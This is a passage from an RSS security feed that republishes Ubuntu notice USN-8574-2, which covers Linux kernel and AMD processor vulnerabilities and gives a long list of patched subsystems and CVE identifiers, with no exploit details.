CVE-2026-46137, CVE-2026-46138, CVE-2026-46139, CVE-2026-46142,
CVE-2026-46143, CVE-2026-46144, CVE-2026-46145, CVE-2026-46146,
CVE-2026-46149, CVE-2026-46150, CVE-2026-46151, CVE-2026-46152,
CVE-2026-46157, CVE-2026-46159, CVE-2026-46160, CVE-2026-46161,
CVE-2026-46163, CVE-2026-46164, CVE-2026-46167, CVE-2026-46168,
CVE-2026-46169, CVE-2026-46172, CVE-2026-46173, CVE-2026-46174,
CVE-2026-46176, CVE-2026-46177, CVE-2026-46178, CVE-2026-46179,
CVE-2026-46180, CVE-2026-46184, CVE-2026-46186, CVE-2026-46187,
CVE-2026-46189, CVE-2026-46190, CVE-2026-46191, CVE-2026-46193,
CVE-2026-46194, CVE-2026-46196, CVE-2026-46197, CVE-2026-46198,
CVE-2026-46199, CVE-2026-46200, CVE-2026-46201, CVE-2026-46204,
CVE-2026-46205, CVE-2026-46206, CVE-2026-46207, CVE-2026-46208,
CVE-2026-46209, CVE-2026-46211, CVE-2026-46212, CVE-2026-46214,
CVE-2026-46218, CVE-2026-46219, CVE-2026-46220, CVE-2026-46225,
CVE-2026-46226, CVE-2026-46227, CVE-2026-46229, CVE-2026-46230,
CVE-2026-46231, CVE-2026-46232, CVE-2026-46233, CVE-2026-46234,
CVE-2026-46235, CVE-2026-46236, CVE-2026-46238, CVE-2026-46241,
CVE-2026-46273, CVE-2026-46274, CVE-2026-46280, CVE-2026-46282,
CVE-2026-46285, CVE-2026-46286, CVE-2026-46287, CVE-2026-46291,
CVE-2026-46292, CVE-2026-46293, CVE-2026-46294, CVE-2026-46296,
CVE-2026-46299, CVE-2026-46301, CVE-2026-46303, CVE-2026-46304,
CVE-2026-46306, CVE-2026-46307, CVE-2026-46312, CVE-2026-46314,
CVE-2026-46319, CVE-2026-52911, CVE-2026-52920, CVE-2026-52925,
CVE-2026-52933, CVE-2026-52936, CVE-2026-52951, CVE-2026-52954,
CVE-2026-52955, CVE-2026-52957, CVE-2026-52958, CVE-2026-52961,
CVE-2026-52962, CVE-2026-52963, CVE-2026-52964, CVE-2026-52967,
CVE-2026-52968, CVE-2026-52969, CVE-2026-52970, CVE-2026-52974,
CVE-2026-52975, CVE-2026-52977, CVE-2026-52981, CVE-2026-52982,
CVE-2026-52984, CVE-2026-52985, CVE-2026-52986, CVE-2026-52989,
CVE-2026-52990, CVE-2026-52992, CVE-2026-52993, CVE-2026-52995,
CVE-2026-52998, CVE-2026-52999, CVE-2026-53001, CVE-2026-53002,
CVE-2026-53003, CVE-2026-53004, CVE-2026-53006, CVE-2026-53011,
CVE-2026-53012, CVE-2026-53013, CVE-2026-53014, CVE-2026-53015,
CVE-2026-53016, CVE-2026-53021, CVE-2026-53022, CVE-2026-53023,
CVE-2026-53032, CVE-2026-53033, CVE-2026-53034, CVE-2026-53035,
CVE-2026-53036, CVE-2026-53037, CVE-2026-53039, CVE-2026-53040,
CVE-2026-53041, CVE-2026-53043, CVE-2026-53045, CVE-2026-53046,
CVE-2026-53047, CVE-2026-53048, CVE-2026-53049, CVE-2026-53050,
CVE-2026-53052, CVE-2026-53056, CVE-2026-53058, CVE-2026-53059,
CVE-2026-53060, CVE-2026-53061, CVE-2026-53062, CVE-2026-53063,
CVE-2026-53064, CVE-2026-53065, CVE-2026-53066, CVE-2026-53068,
CVE-2026-53069, CVE-2026-53071, CVE-2026-53072, CVE-2026-53073,
CVE-2026-53074, CVE-2026-53075, CVE-2026-53076, CVE-2026-53077,
CVE-2026-53082, CVE-2026-53083, CVE-2026-53084, CVE-2026-53085,
CVE-2026-53086, CVE-2026-53088, CVE-2026-53093, CVE-2026-53094,
CVE-2026-53096, CVE-2026-53097, CVE-2026-53098, CVE-2026-53110,
CVE-2026-53111, CVE-2026-53112, CVE-2026-53115, CVE-2026-53117,
CVE-2026-53122, CVE-2026-53123, CVE-2026-53126, CVE-2026-53128,
CVE-2026-53130, CVE-2026-53279, CVE-2026-53287, CVE-2026-53289,
CVE-2026-53291, CVE-2026-53293, CVE-2026-53294, CVE-2026-53295,
CVE-2026-53296, CVE-2026-53303, CVE-2026-53304, CVE-2026-53306,
CVE-2026-53309, CVE-2026-53314, CVE-2026-53320, CVE-2026-53354,
CVE-2026-53369, CVE-2026-53374, CVE-2026-53375, CVE-2026-53376,
CVE-2026-53379, CVE-2026-63838, CVE-2026-63843, CVE-2026-63844,
CVE-2026-63845, CVE-2026-63846, CVE-2026-63847, CVE-2026-63848,
CVE-2026-63851, CVE-2026-63852, CVE-2026-63854, CVE-2026-63855,
CVE-2026-63856, CVE-2026-63860, CVE-2026-63861, CVE-2026-63862,
CVE-2026-63865, CVE-2026-64164)]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8574-2: Linux kernel vulnerabilities]]></title>
<description><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shar...]]></description>
<link>https://tsecurity.de/de/3688324/unix-server/usn-8574-2-linux-kernel-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688324/unix-server/usn-8574-2-linux-kernel-vulnerabilities/</guid>
<pubDate>Thu, 23 Jul 2026 10:01:06 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shared resources in the operation cache. A local attacker could possibly
use this issue to corrupt instructions executed at a higher privilege
level, resulting in privilege escalation. (CVE-2025-54518)

It was discovered that some AMD Zen 5 processors supporting RDSEED
instruction did not properly handle entropy, potentially resulting in the
consumption of insufficiently random values. A local attacker could
possibly use this issue to influence the values returned by the RDSEED
instruction causing loss of confidentiality and integrity. (CVE-2025-62626)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - ARM64 architecture;
  - RISC-V architecture;
  - S390 architecture;
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - Compute Acceleration Framework;
  - ACPI drivers;
  - Serial ATA and Parallel ATA drivers;
  - Drivers core;
  - Power management core;
  - DRBD Distributed Replicated Block Device drivers;
  - Rados block device (RBD) driver;
  - Compressed RAM block device driver;
  - Bluetooth drivers;
  - Bus devices;
  - Character device driver;
  - Clock framework and drivers;
  - Data acquisition framework and drivers;
  - Counter interface drivers;
  - CPU frequency scaling framework;
  - Hardware crypto device drivers;
  - CXL (Compute Express Link) drivers;
  - DMA engine subsystem;
  - EDAC drivers;
  - EFI core;
  - GPU drivers;
  - Greybus drivers;
  - HID subsystem;
  - Hardware monitoring drivers;
  - I2C subsystem;
  - IIO ADC drivers;
  - IIO subsystem;
  - InfiniBand drivers;
  - Input Device (Miscellaneous) drivers;
  - IRQ chip drivers;
  - LED subsystem;
  - Mailbox framework;
  - Multiple devices driver;
  - Media drivers;
  - MediaTek SMI driver;
  - NVIDIA Tegra memory controller driver;
  - Fastrpc Driver;
  - IBM Advanced System Management driver;
  - MMC subsystem;
  - MTD block device drivers;
  - Network drivers;
  - Ethernet bonding driver;
  - Mellanox network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - STMicroelectronics network drivers;
  - Ethernet team driver;
  - MediaTek network drivers;
  - Near Field Communication (NFC) drivers;
  - NTB driver;
  - NVDIMM (Non-Volatile Memory Device) drivers;
  - NVME drivers;
  - Device tree and open firmware driver;
  - PCI subsystem;
  - Pin controllers subsystem;
  - x86 platform drivers;
  - Broadcom BCM2835 power domain driver;
  - Generic PM domains;
  - i.MX PM domains;
  - Remote Processor subsystem;
  - S/390 drivers;
  - SCSI subsystem;
  - SLIMbus drivers;
  - Freescale SoC drivers;
  - Microchip PolarFire SoC system controller driver;
  - SPI subsystem;
  - Media staging drivers;
  - Realtek RTL8723BS SDIO drivers;
  - SM750 framebuffer staging driver;
  - TCM subsystem;
  - Thermal drivers;
  - TTY drivers;
  - UFS subsystem;
  - Cadence USB3 driver;
  - USB Device Class drivers;
  - ULPI bus;
  - USB core drivers;
  - DesignWare USB2 driver;
  - USB Gadget drivers;
  - USB Host Controller drivers;
  - Mustek MDC800 USB digital camera driver;
  - USB YUREX driver;
  - Renesas USBHS Controller drivers;
  - USB Type-C Connector System Software Interface driver;
  - VFIO drivers;
  - Framebuffer layer;
  - TSM TDX Guest driver;
  - Xen hypervisor drivers;
  - File systems infrastructure;
  - BTRFS file system;
  - Ceph distributed file system;
  - EROFS file system;
  - Ext4 file system;
  - F2FS file system;
  - FUSE (File system in Userspace);
  - GFS2 file system;
  - HFS+ file system;
  - Journaling layer for block devices (JBD2);
  - Network file systems library;
  - Network file system (NFS) server daemon;
  - NILFS2 file system;
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - Diskquota system;
  - SMB network file system;
  - SquashFS file system;
  - Tracing file system;
  - UDF file system;
  - XFS file system;
  - Kernel CPU control infrastructure;
  - QorIQ DPAA2 FSL-MC bus driver;
  - Memory Management;
  - Integrity Measurement Architecture(IMA) framework;
  - KVM subsystem;
  - Memory management;
  - Networking core;
  - padata parallel execution mechanism;
  - PPP protocol drivers and compressors;
  - Linux Security Modules (LSM) Framework;
  - Tracing infrastructure;
  - Network traffic control;
  - Distributed Switch Architecture;
  - IPv4 networking;
  - IP tunnels definitions;
  - MAC80211 subsystem;
  - Netfilter;
  - User-space API (UAPI);
  - io_uring subsystem;
  - Audit subsystem;
  - BPF subsystem;
  - Control group (cgroup);
  - Perf events;
  - Kernel exit() syscall;
  - Kernel fork() syscall;
  - Kernel futex primitives;
  - KProbes tracing;
  - Locking primitives;
  - Kernel module support;
  - Padata parallel execution mechanism;
  - Cryptographic library;
  - Heterogeneous memory management;
  - KASAN memory debugging framework;
  - Asynchronous Transfer Mode (ATM) subsystem;
  - B.A.T.M.A.N. meshing protocol;
  - Bluetooth subsystem;
  - Ethernet bridge;
  - CAIF protocol;
  - CAN network layer;
  - Ceph Core library;
  - IPv6 networking;
  - XFRM subsystem;
  - L2TP protocol;
  - Management Component Transport Protocol (MCTP);
  - Multipath TCP;
  - NCSI (Network Controller Sideband Interface) driver;
  - NFC subsystem;
  - Open vSwitch;
  - Packet sockets;
  - Qualcomm IPC Router (QRTR);
  - RDS protocol;
  - RF switch subsystem;
  - Rose network layer;
  - RxRPC session sockets;
  - SCTP protocol;
  - SMC sockets;
  - Stream parser;
  - Sun RPC protocol;
  - TIPC protocol;
  - TLS protocol;
  - Unix domain sockets;
  - VMware vSockets driver;
  - Wireless networking;
  - X.25 network layer;
  - eXpress Data Path;
  - Landlock security;
  - ALSA framework;
  - Generic PCM loopback sound driver;
  - FireWire sound drivers;
  - HD-audio driver;
  - Creative Sound Blaster X-Fi driver;
  - AMD SoC Alsa drivers;
  - QCOM ASoC drivers;
  - Renesas ASoC drivers;
  - Samsung ASoC drivers;
  - SoC audio core drivers;
  - SOF drivers;
  - STI ASoC drivers;
  - USB sound devices;
  - Objtool;
(CVE-2025-21709, CVE-2025-22116, CVE-2025-38426, CVE-2025-39764,
CVE-2025-40135, CVE-2025-40150, CVE-2025-68175, CVE-2025-68239,
CVE-2025-68334, CVE-2025-68736, CVE-2025-71152, CVE-2025-71161,
CVE-2025-71203, CVE-2025-71221, CVE-2025-71269, CVE-2025-71287,
CVE-2025-71288, CVE-2026-22981, CVE-2026-22985, CVE-2026-22993,
CVE-2026-23004, CVE-2026-23066, CVE-2026-23104, CVE-2026-23118,
CVE-2026-23138, CVE-2026-23154, CVE-2026-23157, CVE-2026-23171,
CVE-2026-23207, CVE-2026-23226, CVE-2026-23227, CVE-2026-23244,
CVE-2026-23245, CVE-2026-23246, CVE-2026-23253, CVE-2026-23255,
CVE-2026-23270, CVE-2026-23271, CVE-2026-23276, CVE-2026-23277,
CVE-2026-23279, CVE-2026-23281, CVE-2026-23284, CVE-2026-23285,
CVE-2026-23286, CVE-2026-23287, CVE-2026-23289, CVE-2026-23290,
CVE-2026-23291, CVE-2026-23292, CVE-2026-23293, CVE-2026-23296,
CVE-2026-23298, CVE-2026-23300, CVE-2026-23302, CVE-2026-23303,
CVE-2026-23304, CVE-2026-23306, CVE-2026-23307, CVE-2026-23308,
CVE-2026-23310, CVE-2026-23312, CVE-2026-23313, CVE-2026-23315,
CVE-2026-23317, CVE-2026-23318, CVE-2026-23319, CVE-2026-23321,
CVE-2026-23324, CVE-2026-23325, CVE-2026-23330, CVE-2026-23334,
CVE-2026-23335, CVE-2026-23336, CVE-2026-23339, CVE-2026-23340,
CVE-2026-23343, CVE-2026-23347, CVE-2026-23352, CVE-2026-23356,
CVE-2026-23357, CVE-2026-23359, CVE-2026-23360, CVE-2026-23361,
CVE-2026-23362, CVE-2026-23363, CVE-2026-23364, CVE-2026-23365,
CVE-2026-23367, CVE-2026-23368, CVE-2026-23369, CVE-2026-23370,
CVE-2026-23372, CVE-2026-23374, CVE-2026-23375, CVE-2026-23378,
CVE-2026-23379, CVE-2026-23381, CVE-2026-23382, CVE-2026-23383,
CVE-2026-23386, CVE-2026-23387, CVE-2026-23388, CVE-2026-23389,
CVE-2026-23391, CVE-2026-23395, CVE-2026-23396, CVE-2026-23397,
CVE-2026-23398, CVE-2026-23399, CVE-2026-23401, CVE-2026-23412,
CVE-2026-23413, CVE-2026-23414, CVE-2026-23418, CVE-2026-23419,
CVE-2026-23420, CVE-2026-23426, CVE-2026-23434, CVE-2026-23438,
CVE-2026-23439, CVE-2026-23440, CVE-2026-23441, CVE-2026-23442,
CVE-2026-23444, CVE-2026-23446, CVE-2026-23447, CVE-2026-23448,
CVE-2026-23449, CVE-2026-23452, CVE-2026-23454, CVE-2026-23456,
CVE-2026-23457, CVE-2026-23458, CVE-2026-23460, CVE-2026-23461,
CVE-2026-23462, CVE-2026-23463, CVE-2026-23464, CVE-2026-23465,
CVE-2026-23468, CVE-2026-23470, CVE-2026-23474, CVE-2026-23475,
CVE-2026-31389, CVE-2026-31391, CVE-2026-31392, CVE-2026-31393,
CVE-2026-31394, CVE-2026-31396, CVE-2026-31399, CVE-2026-31400,
CVE-2026-31403, CVE-2026-31405, CVE-2026-31407, CVE-2026-31408,
CVE-2026-31409, CVE-2026-31412, CVE-2026-31413, CVE-2026-31414,
CVE-2026-31415, CVE-2026-31416, CVE-2026-31417, CVE-2026-31421,
CVE-2026-31422, CVE-2026-31423, CVE-2026-31424, CVE-2026-31425,
CVE-2026-31426, CVE-2026-31427, CVE-2026-31428, CVE-2026-31429,
CVE-2026-31430, CVE-2026-31432, CVE-2026-31433, CVE-2026-31434,
CVE-2026-31438, CVE-2026-31439, CVE-2026-31440, CVE-2026-31441,
CVE-2026-31446, CVE-2026-31447, CVE-2026-31449, CVE-2026-31450,
CVE-2026-31451, CVE-2026-31452, CVE-2026-31453, CVE-2026-31454,
CVE-2026-31455, CVE-2026-31458, CVE-2026-31464, CVE-2026-31466,
CVE-2026-31467, CVE-2026-31469, CVE-2026-31470, CVE-2026-31473,
CVE-2026-31474, CVE-2026-31476, CVE-2026-31477, CVE-2026-31480,
CVE-2026-31482, CVE-2026-31483, CVE-2026-31485, CVE-2026-31487,
CVE-2026-31488, CVE-2026-31489, CVE-2026-31492, CVE-2026-31494,
CVE-2026-31495, CVE-2026-31496, CVE-2026-31497, CVE-2026-31498,
CVE-2026-31499, CVE-2026-31500, CVE-2026-31502, CVE-2026-31503,
CVE-2026-31505, CVE-2026-31506, CVE-2026-31507, CVE-2026-31508,
CVE-2026-31509, CVE-2026-31510, CVE-2026-31511, CVE-2026-31512,
CVE-2026-31515, CVE-2026-31516, CVE-2026-31518, CVE-2026-31519,
CVE-2026-31520, CVE-2026-31521, CVE-2026-31522, CVE-2026-31523,
CVE-2026-31524, CVE-2026-31525, CVE-2026-31527, CVE-2026-31528,
CVE-2026-31530, CVE-2026-31532, CVE-2026-31540, CVE-2026-31542,
CVE-2026-31545, CVE-2026-31546, CVE-2026-31548, CVE-2026-31549,
CVE-2026-31550, CVE-2026-31551, CVE-2026-31552, CVE-2026-31554,
CVE-2026-31555, CVE-2026-31556, CVE-2026-31557, CVE-2026-31563,
CVE-2026-31565, CVE-2026-31566, CVE-2026-31570, CVE-2026-31575,
CVE-2026-31576, CVE-2026-31577, CVE-2026-31578, CVE-2026-31580,
CVE-2026-31581, CVE-2026-31582, CVE-2026-31583, CVE-2026-31584,
CVE-2026-31585, CVE-2026-31586, CVE-2026-31587, CVE-2026-31588,
CVE-2026-31590, CVE-2026-31594, CVE-2026-31595, CVE-2026-31596,
CVE-2026-31597, CVE-2026-31598, CVE-2026-31599, CVE-2026-31602,
CVE-2026-31603, CVE-2026-31604, CVE-2026-31605, CVE-2026-31606,
CVE-2026-31610, CVE-2026-31611, CVE-2026-31612, CVE-2026-31613,
CVE-2026-31615, CVE-2026-31616, CVE-2026-31617, CVE-2026-31618,
CVE-2026-31619, CVE-2026-31622, CVE-2026-31623, CVE-2026-31624,
CVE-2026-31625, CVE-2026-31626, CVE-2026-31627, CVE-2026-31628,
CVE-2026-31629, CVE-2026-31634, CVE-2026-31638, CVE-2026-31639,
CVE-2026-31642, CVE-2026-31645, CVE-2026-31646, CVE-2026-31648,
CVE-2026-31651, CVE-2026-31655, CVE-2026-31656, CVE-2026-31658,
CVE-2026-31660, CVE-2026-31661, CVE-2026-31662, CVE-2026-31664,
CVE-2026-31665, CVE-2026-31667, CVE-2026-31670, CVE-2026-31671,
CVE-2026-31672, CVE-2026-31673, CVE-2026-31674, CVE-2026-31675,
CVE-2026-31677, CVE-2026-31678, CVE-2026-31679, CVE-2026-31680,
CVE-2026-31681, CVE-2026-31683, CVE-2026-31684, CVE-2026-31686,
CVE-2026-31689, CVE-2026-31694, CVE-2026-31695, CVE-2026-31696,
CVE-2026-31697, CVE-2026-31698, CVE-2026-31699, CVE-2026-31700,
CVE-2026-31701, CVE-2026-31702, CVE-2026-31704, CVE-2026-31705,
CVE-2026-31706, CVE-2026-31707, CVE-2026-31708, CVE-2026-31709,
CVE-2026-31711, CVE-2026-31712, CVE-2026-31714, CVE-2026-31715,
CVE-2026-31716, CVE-2026-31720, CVE-2026-31721, CVE-2026-31722,
CVE-2026-31723, CVE-2026-31724, CVE-2026-31725, CVE-2026-31726,
CVE-2026-31728, CVE-2026-31729, CVE-2026-31730, CVE-2026-31731,
CVE-2026-31737, CVE-2026-31738, CVE-2026-31740, CVE-2026-31741,
CVE-2026-31747, CVE-2026-31748, CVE-2026-31749, CVE-2026-31751,
CVE-2026-31752, CVE-2026-31754, CVE-2026-31755, CVE-2026-31756,
CVE-2026-31758, CVE-2026-31759, CVE-2026-31761, CVE-2026-31762,
CVE-2026-31763, CVE-2026-31767, CVE-2026-31768, CVE-2026-31770,
CVE-2026-31772, CVE-2026-31773, CVE-2026-31778, CVE-2026-31779,
CVE-2026-31780, CVE-2026-31781, CVE-2026-31788, CVE-2026-43007,
CVE-2026-43012, CVE-2026-43013, CVE-2026-43014, CVE-2026-43015,
CVE-2026-43016, CVE-2026-43017, CVE-2026-43018, CVE-2026-43019,
CVE-2026-43020, CVE-2026-43023, CVE-2026-43024, CVE-2026-43025,
CVE-2026-43026, CVE-2026-43027, CVE-2026-43028, CVE-2026-43030,
CVE-2026-43032, CVE-2026-43035, CVE-2026-43036, CVE-2026-43040,
CVE-2026-43041, CVE-2026-43043, CVE-2026-43044, CVE-2026-43046,
CVE-2026-43047, CVE-2026-43049, CVE-2026-43050, CVE-2026-43051,
CVE-2026-43052, CVE-2026-43054, CVE-2026-43056, CVE-2026-43057,
CVE-2026-43058, CVE-2026-43059, CVE-2026-43060, CVE-2026-43061,
CVE-2026-43062, CVE-2026-43064, CVE-2026-43065, CVE-2026-43066,
CVE-2026-43068, CVE-2026-43069, CVE-2026-43072, CVE-2026-43073,
CVE-2026-43074, CVE-2026-43075, CVE-2026-43076, CVE-2026-43079,
CVE-2026-43080, CVE-2026-43081, CVE-2026-43082, CVE-2026-43084,
CVE-2026-43085, CVE-2026-43086, CVE-2026-43088, CVE-2026-43089,
CVE-2026-43091, CVE-2026-43092, CVE-2026-43093, CVE-2026-43094,
CVE-2026-43098, CVE-2026-43099, CVE-2026-43103, CVE-2026-43104,
CVE-2026-43105, CVE-2026-43107, CVE-2026-43109, CVE-2026-43110,
CVE-2026-43111, CVE-2026-43112, CVE-2026-43113, CVE-2026-43119,
CVE-2026-43120, CVE-2026-43129, CVE-2026-43162, CVE-2026-43245,
CVE-2026-43252, CVE-2026-43265, CVE-2026-43281, CVE-2026-43324,
CVE-2026-43327, CVE-2026-43328, CVE-2026-43329, CVE-2026-43330,
CVE-2026-43332, CVE-2026-43333, CVE-2026-43334, CVE-2026-43336,
CVE-2026-43338, CVE-2026-43339, CVE-2026-43340, CVE-2026-43342,
CVE-2026-43343, CVE-2026-43345, CVE-2026-43350, CVE-2026-43355,
CVE-2026-43357, CVE-2026-43359, CVE-2026-43360, CVE-2026-43361,
CVE-2026-43362, CVE-2026-43363, CVE-2026-43365, CVE-2026-43366,
CVE-2026-43368, CVE-2026-43370, CVE-2026-43371, CVE-2026-43372,
CVE-2026-43373, CVE-2026-43377, CVE-2026-43380, CVE-2026-43381,
CVE-2026-43382, CVE-2026-43386, CVE-2026-43387, CVE-2026-43395,
CVE-2026-43397, CVE-2026-43405, CVE-2026-43408, CVE-2026-43409,
CVE-2026-43411, CVE-2026-43412, CVE-2026-43413, CVE-2026-43415,
CVE-2026-43419, CVE-2026-43420, CVE-2026-43421, CVE-2026-43424,
CVE-2026-43425, CVE-2026-43426, CVE-2026-43427, CVE-2026-43428,
CVE-2026-43429, CVE-2026-43430, CVE-2026-43432, CVE-2026-43436,
CVE-2026-43437, CVE-2026-43439, CVE-2026-43441, CVE-2026-43445,
CVE-2026-43448, CVE-2026-43449, CVE-2026-43450, CVE-2026-43451,
CVE-2026-43452, CVE-2026-43453, CVE-2026-43455, CVE-2026-43456,
CVE-2026-43457, CVE-2026-43458, CVE-2026-43459, CVE-2026-43466,
CVE-2026-43467, CVE-2026-43468, CVE-2026-43469, CVE-2026-43471,
CVE-2026-43472, CVE-2026-43473, CVE-2026-43475, CVE-2026-43476,
CVE-2026-43480, CVE-2026-43483, CVE-2026-43484, CVE-2026-43488,
CVE-2026-43490, CVE-2026-43491, CVE-2026-43492, CVE-2026-43495,
CVE-2026-43496, CVE-2026-43497, CVE-2026-43499, CVE-2026-43502,
CVE-2026-45834, CVE-2026-45835, CVE-2026-45836, CVE-2026-45838,
CVE-2026-45839, CVE-2026-45840, CVE-2026-45841, CVE-2026-45842,
CVE-2026-45843, CVE-2026-45844, CVE-2026-45845, CVE-2026-45846,
CVE-2026-45855, CVE-2026-45858, CVE-2026-45899, CVE-2026-45911,
CVE-2026-45920, CVE-2026-45924, CVE-2026-45942, CVE-2026-45943,
CVE-2026-45956, CVE-2026-45958, CVE-2026-45985, CVE-2026-45986,
CVE-2026-45987, CVE-2026-45989, CVE-2026-45991, CVE-2026-45994,
CVE-2026-45996, CVE-2026-45997, CVE-2026-45999, CVE-2026-46002,
CVE-2026-46003, CVE-2026-46004, CVE-2026-46005, CVE-2026-46006,
CVE-2026-46007, CVE-2026-46009, CVE-2026-46011, CVE-2026-46012,
CVE-2026-46015, CVE-2026-46016, CVE-2026-46018, CVE-2026-46019,
CVE-2026-46021, CVE-2026-46022, CVE-2026-46023, CVE-2026-46024,
CVE-2026-46026, CVE-2026-46027, CVE-2026-46031, CVE-2026-46033,
CVE-2026-46037, CVE-2026-46038, CVE-2026-46040, CVE-2026-46041,
CVE-2026-46044, CVE-2026-46046, CVE-2026-46047, CVE-2026-46049,
CVE-2026-46050, CVE-2026-46051, CVE-2026-46052, CVE-2026-46053,
CVE-2026-46056, CVE-2026-46058, CVE-2026-46061, CVE-2026-46062,
CVE-2026-46063, CVE-2026-46064, CVE-2026-46065, CVE-2026-46068,
CVE-2026-46069, CVE-2026-46070, CVE-2026-46072, CVE-2026-46073,
CVE-2026-46075, CVE-2026-46076, CVE-2026-46077, CVE-2026-46078,
CVE-2026-46079, CVE-2026-46080, CVE-2026-46082, CVE-2026-46083,
CVE-2026-46084, CVE-2026-46086, CVE-2026-46088, CVE-2026-46089,
CVE-2026-46090, CVE-2026-46091, CVE-2026-46092, CVE-2026-46094,
CVE-2026-46098, CVE-2026-46099, CVE-2026-46101, CVE-2026-46102,
CVE-2026-46103, CVE-2026-46106, CVE-2026-46107, CVE-2026-46108,
CVE-2026-46110, CVE-2026-46111, CVE-2026-46112, CVE-2026-46113,
CVE-2026-46114, CVE-2026-46116, CVE-2026-46117, CVE-2026-46120,
CVE-2026-46121, CVE-2026-46122, CVE-2026-46123, CVE-2026-46124,
CVE-2026-46125, CVE-2026-46126, CVE-2026-46127, CVE-2026-46128,
CVE-2026-46129, CVE-2026-46131, CVE-2026-46132, CVE-2026-46133,
CVE-2026-46136, CVE-2026-46137, CVE-2026-46138, CVE-2026-46139,
CVE-2026-46142, CVE-2026-46143, CVE-2026-46144, CVE-2026-46145,
CVE-2026-46146, CVE-2026-46149, CVE-2026-46150, CVE-2026-46151,
CVE-2026-46152, CVE-2026-46157, CVE-2026-46159, CVE-2026-46160,
CVE-2026-46161, CVE-2026-46163, CVE-2026-46164, CVE-2026-46167,
CVE-2026-46168, CVE-2026-46169, CVE-2026-46172, CVE-2026-46173,
CVE-2026-46174, CVE-2026-46176, CVE-2026-46177, CVE-2026-46178,
CVE-2026-46179, CVE-2026-46180, CVE-2026-46184, CVE-2026-46186,
CVE-2026-46187, CVE-2026-46189, CVE-2026-46190, CVE-2026-46191,
CVE-2026-46193, CVE-2026-46194, CVE-2026-46196, CVE-2026-46197,
CVE-2026-46198, CVE-2026-46199, CVE-2026-46200, CVE-2026-46201,
CVE-2026-46204, CVE-2026-46205, CVE-2026-46206, CVE-2026-46207,
CVE-2026-46208, CVE-2026-46209, CVE-2026-46211, CVE-2026-46212,
CVE-2026-46214, CVE-2026-46218, CVE-2026-46219, CVE-2026-46220,
CVE-2026-46225, CVE-2026-46226, CVE-2026-46227, CVE-2026-46229,
CVE-2026-46230, CVE-2026-46231, CVE-2026-46232, CVE-2026-46233,
CVE-2026-46234, CVE-2026-46235, CVE-2026-46236, CVE-2026-46238,
CVE-2026-46241, CVE-2026-46273, CVE-2026-46274, CVE-2026-46280,
CVE-2026-46282, CVE-2026-46285, CVE-2026-46286, CVE-2026-46287,
CVE-2026-46291, CVE-2026-46292, CVE-2026-46293, CVE-2026-46294,
CVE-2026-46296, CVE-2026-46299, CVE-2026-46301, CVE-2026-46303,
CVE-2026-46304, CVE-2026-46306, CVE-2026-46307, CVE-2026-46312,
CVE-2026-46314, CVE-2026-46319, CVE-2026-52911, CVE-2026-52920,
CVE-2026-52925, CVE-2026-52933, CVE-2026-52936, CVE-2026-52951,
CVE-2026-52954, CVE-2026-52955, CVE-2026-52957, CVE-2026-52958,
CVE-2026-52961, CVE-2026-52962, CVE-2026-52963, CVE-2026-52964,
CVE-2026-52967, CVE-2026-52968, CVE-2026-52969, CVE-2026-52970,
CVE-2026-52974, CVE-2026-52975, CVE-2026-52977, CVE-2026-52981,
CVE-2026-52982, CVE-2026-52984, CVE-2026-52985, CVE-2026-52986,
CVE-2026-52989, CVE-2026-52990, CVE-2026-52992, CVE-2026-52993,
CVE-2026-52995, CVE-2026-52998, CVE-2026-52999, CVE-2026-53001,
CVE-2026-53002, CVE-2026-53003, CVE-2026-53004, CVE-2026-53006,
CVE-2026-53011, CVE-2026-53012, CVE-2026-53013, CVE-2026-53014,
CVE-2026-53015, CVE-2026-53016, CVE-2026-53021, CVE-2026-53022,
CVE-2026-53023, CVE-2026-53032, CVE-2026-53033, CVE-2026-53034,
CVE-2026-53035, CVE-2026-53036, CVE-2026-53037, CVE-2026-53039,
CVE-2026-53040, CVE-2026-53041, CVE-2026-53043, CVE-2026-53045,
CVE-2026-53046, CVE-2026-53047, CVE-2026-53048, CVE-2026-53049,
CVE-2026-53050, CVE-2026-53052, CVE-2026-53056, CVE-2026-53058,
CVE-2026-53059, CVE-2026-53060, CVE-2026-53061, CVE-2026-53062,
CVE-2026-53063, CVE-2026-53064, CVE-2026-53065, CVE-2026-53066,
CVE-2026-53068, CVE-2026-53069, CVE-2026-53071, CVE-2026-53072,
CVE-2026-53073, CVE-2026-53074, CVE-2026-53075, CVE-2026-53076,
CVE-2026-53077, CVE-2026-53082, CVE-2026-53083, CVE-2026-53084,
CVE-2026-53085, CVE-2026-53086, CVE-2026-53088, CVE-2026-53093,
CVE-2026-53094, CVE-2026-53096, CVE-2026-53097, CVE-2026-53098,
CVE-2026-53110, CVE-2026-53111, CVE-2026-53112, CVE-2026-53115,
CVE-2026-53117, CVE-2026-53122, CVE-2026-53123, CVE-2026-53126,
CVE-2026-53128, CVE-2026-53130, CVE-2026-53279, CVE-2026-53287,
CVE-2026-53289, CVE-2026-53291, CVE-2026-53293, CVE-2026-53294,
CVE-2026-53295, CVE-2026-53296, CVE-2026-53303, CVE-2026-53304,
CVE-2026-53306, CVE-2026-53309, CVE-2026-53314, CVE-2026-53320,
CVE-2026-53369, CVE-2026-53374, CVE-2026-53375, CVE-2026-53376,
CVE-2026-53379, CVE-2026-63838, CVE-2026-63843, CVE-2026-63844,
CVE-2026-63845, CVE-2026-63846, CVE-2026-63847, CVE-2026-63848,
CVE-2026-63851, CVE-2026-63852, CVE-2026-63854, CVE-2026-63855,
CVE-2026-63856, CVE-2026-63860, CVE-2026-63861, CVE-2026-63862,
CVE-2026-63865, CVE-2026-64164)]]></content:encoded>
</item>
<item>
